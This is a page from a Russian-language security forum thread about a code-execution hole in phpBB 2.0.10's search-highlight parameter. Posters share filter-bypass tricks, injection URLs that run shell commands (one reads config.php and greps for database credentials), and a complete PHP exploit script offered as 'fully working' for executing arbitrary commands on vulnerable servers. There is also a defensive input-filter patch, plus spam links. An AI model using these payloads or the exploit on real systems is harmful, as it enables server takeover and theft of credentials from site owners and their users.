Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4 5 ... 7 След.
RSS
SQL-инъекция и php инклудинг в phpBB
 
Ну а для выполнения SQL запроса придется вам самим подумать.
Сразу скажу, sql запрос можно выполнить,
Да кстати результат переменной будет виден в поле автора сообщения -)
 
Если хочется побольше, то стучитесь в асю 321510219
 
Предлагаю лекарство
http://nwmana.net.ru/lekarstvo.html
 
Кто подскажет как обойти проверку символа точки и пробела! Точку скрипт убирает воопще а пробел на | меняет
 
Цитата
hz пишет:
Кто подскажет как обойти проверку символа точки и пробела! Точку скрипт убирает воопще а пробел на | меняет
с точкой что то ничег на ум не приходит, мож на %2E, заменить.
пробел заменяй на /**/
 
А откуда взялось /**/, почему пробел именно на это меняется?
 
вот как это дело обходится в некоторых случаях
&highlight=%2527.$poster=%60$file%60.%2527.&file=ls%20-al
 
Это серьезная дыра.

Я сделал себе вот такую штуку в extension.inc:
$input_arrays = array(
     'HTTP_ENV_VARS',
     'HTTP_GET_VARS',
     'HTTP_POST_VARS',
     'HTTP_COOKIE_VARS',
     'HTTP_POST_FILES',
     'HTTP_SERVER_VARS',
     'HTTP_SESSION_VARS'
);

while(list(,$input_array) = each($input_arrays))
{
     while(list($key,$val) = @each(${$input_array}))
     {
           ${$input_array}[$key]=ereg_replace('%2527|%27', '', $val);
     }
     @reset(${input_array});
}

Этот код выкусит подстроки %2527 или %27 из всех вводимых данных. Есно могут возникнуть глюки, например при аплоаде... Но пока не выйдет новая версия phpbb это поможет...
 
не парьтесь... добавте addslashes

$message = str_replace('\"', '"', substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "preg_replace('#\b(" .addslashes($highlight_match). ")\b#i', '\\\\1', '\\0')", '>' . $message . '<'), 1, -1));
 
[IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG] Оказывается самих phpbb.com дефейснули ... может теперь задумаются о безопасности.
 
Цитата
akran пишет:
А откуда взялось /**/, почему пробел именно на это меняется?
Это открытие и закрытие комментария
 
все равно команда с параметром не исполняется..
 
Цитата
ams666 пишет:
все равно команда с параметром не исполняется..
если только system отключен...
в остальном все там хорошо...
 
Ниже приведён полность работающий эксплоит, позволяющий выполнять любые команды на уязвимом сервере, причём команды с любым количеством параметров. Вот так то, господа олени.


#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10  execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (http://www.howdark.com) (1st October 2004)
#
# Requirement:
#
#    PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

if ($argv[2]){
    $url = $argv[1];
    $command = $argv[2];
}
else {
    echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
    echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
    echo "\tcommand\t command to execute on server  (ex: 'ls -la')\n";
    echo "\ttopic_id\t topic id\n";
    echo "\tproxy\t optional proxy url  (ex: http://10.10.10.10:8080)\n";
    exit;
}
if ($argv[3])
    $topic = $argv[3];
else
    $topic = 1;

if ($argv[4])
    $proxy = $argv[4];


$cmd = str2chr($command);

$action =  "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";         
$ch=curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

    for($i = 0;$i < strlen($str);$i++){
        $chr .= "chr(".ord($str{$i}).")";
        if ($i != strlen($str) -1)
             $chr .= "%252e";    
    }
    return $chr;
}
?>
 
не парьтесь, а скажите addslashes помогает ?
 
Был бы очень рад если бы кто нибудь поделился бы запросами....  [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG]
 
Работающий в отличии от того что было на два поста выше онлайн-эксплоит
http://acolyte z.com/exploits.php?id=704
 
Скажите, а этот эксплойт будет работать, если я его запускаю со своей тачки (из консоли) или надо его заливать на сервер?
 
viewtopic.php?t=1000&highlight=%2527.$poster=%60$ls%60.%2527 &ls=id;uname%20-a;cat%20config.php|grep%20db
 
dc:
не работает :( Топик я поменял...
Страницы: Пред. 1 2 3 4 5 ... 7 След.
Читают тему